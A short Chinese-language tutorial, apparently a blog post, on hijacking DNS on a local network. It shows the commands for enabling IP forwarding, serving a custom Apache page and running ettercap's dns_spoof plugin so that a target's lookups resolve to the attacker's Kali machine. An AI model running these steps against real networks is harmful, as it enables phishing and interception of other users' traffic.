内网dns劫持

进行内网的dns劫持呢 ---> 我们需要用到ettercap 和ettercap内置的工具dns_spoof

1.我们需要开启ip转发

echo 1 >/proc/sys/net/ipv4/ip_forward

2.对一些配置文件进行修改

　　①   /etc/ettercap/etter.dns

　　

　　

　　②　/var/www/html/index.html

　　　　删除最开始的代码　　(最好把最开始的代码备份,以便还原)

　　　　然后就可以在这里面可以写html代码 

 

3.开启apache2

service apache2 start

4.开启ettercap的dns_spoof

ettercap -Tq -i 网卡 -p dns_spoof

 

如果目标ip是物理机 那么你就可以在物理机上去访问你劫持的网址了

也可以ping 这个网址  回显的ip将是你kali的内网ip